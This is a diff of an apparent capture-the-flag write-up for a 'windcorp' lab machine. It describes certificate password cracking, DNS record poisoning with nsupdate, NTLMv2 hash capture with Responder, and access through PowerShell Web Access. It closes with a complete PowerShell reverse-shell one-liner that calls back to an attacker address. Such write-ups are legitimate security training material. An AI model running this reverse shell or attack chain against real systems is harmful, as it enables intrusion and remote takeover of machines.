0xSickb0y/windcorp/README.md

 This directory holds the `cert.pfx` file and `web.config`.

-To extract the private key and public key from the `cert.pfx` file, I used  `pfx2john`.
+I used `pfx2john` to extract the private key and public key from the `cert.pfx` file.

-This process involves converting the `.pfx` file into a format that can be passed to [john the ripper](https://github.com/openwall/john) to find the password for cert.pfx.
+This process involved converting the `.pfx` file into a format that can be passed to [john the ripper](https://github.com/openwall/john) to find the password for cert.pfx.

-#####  cert.pfx hash cracked
+__cert.pfx hash cracked__

 ![Pasted image 20240810030640](https://github.com/user-attachments/assets/09d35346-5184-415e-9882-537baec97df5)

-##### extracted keys
+__extracted keys__

 ![Pasted image 20240810233357](https://github.com/user-attachments/assets/e9f2b6d6-c0c3-4e85-87e2-957ebd797819)

 ### DNS Cache Poisoning

-Based on the previous DNS output, it's possible to exploit vulnerabilities in DNS caching by impersonating DNS nameservers.
-I achieved this by using `nsupdate` to change the A record for `selfservice.windcorp.thm` to an IP address I control.
+Based on the previous DNS output, It was possible to exploit vulnerabilities in DNS caching by impersonating DNS nameservers.
+This was achieved this by using `nsupdate` to change the A record for `selfservice.windcorp.thm` to an IP address i controled.

-Following this change, I performed a DNS query to verify the update.
+Following this change, a DNS query was performed to verify the update.

 ![Pasted image 20240811011257](https://github.com/user-attachments/assets/fbc1dfbe-97fe-48d8-a6a1-51dd1b60f5de)

 ### NTLMv2 Authentication Intercept with MITM

-Using the previously obtained `.pem` keys, I configured [Responder](https://github.com/lgandx/Responder) to interact with the domain `selfservice.windcorp.thm` in https.
-Responder will use these keys to handle requests made to this domain, potentially allowing for responses that leverage the authentication or encryption provided by the keys.
+Using the previously obtained `.pem` keys, I configured [Responder](https://github.com/lgandx/Responder) to interact with the domain `selfservice.windcorp.thm` over HTTPS.
+Responder used these keys to handle requests made to this domain, potentially allowing for responses that leveraged the authentication or encryption provided by the keys.

-The `.pem` keys include the private key and public certificate necessary for secure communication or authentication processes.
+The `.pem` keys included the private key and public certificate necessary for secure communication or authentication processes.

-After a few seconds, _responder_ captured an NTLMv2 hash for `edwardle`, which was cracked using the `rockyou` wordlist.
+After a few seconds, Responder captured an NTLMv2 hash for `edwardle`, which I cracked using the `rockyou` wordlist.

 ![Pasted image 20240811012157](https://github.com/user-attachments/assets/0c5bd5b7-503a-4191-b272-08a0c3d89c37)

 ![Pasted image 20240811012642](https://github.com/user-attachments/assets/e6b41d5d-e1a9-4567-9154-b3756305869b)

 ### Initial Access Ra2

-Upon returning to the `/powershell` page using `edwardle`s credentials, I was greeted with a PowerShell console.
+I could established RCE on the machine by logging to the `Powershell Web Access` page with `edwardle` credentials.

 ![Pasted image 20240811013844](https://github.com/user-attachments/assets/fdc3fc06-16af-429a-9963-1d5d5b5a0bf1)

-The [Nishang](https://github.com/samratashok/nishang) script `Invoke-PowerShellTcpOneLine.ps1` was transferred via the web interface to obtain a reverse shell on the system.
+To obtain a reverse shell on the machine, i encoded the [Nishang](https://github.com/samratashok/nishang) script `Invoke-PowerShellTcpOneLine.ps1` in Base64, and transfered it via the PowerShell web interface

 ```powershell
 $client = New-Object System.Net.Sockets.TCPClient($ip_addr,9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()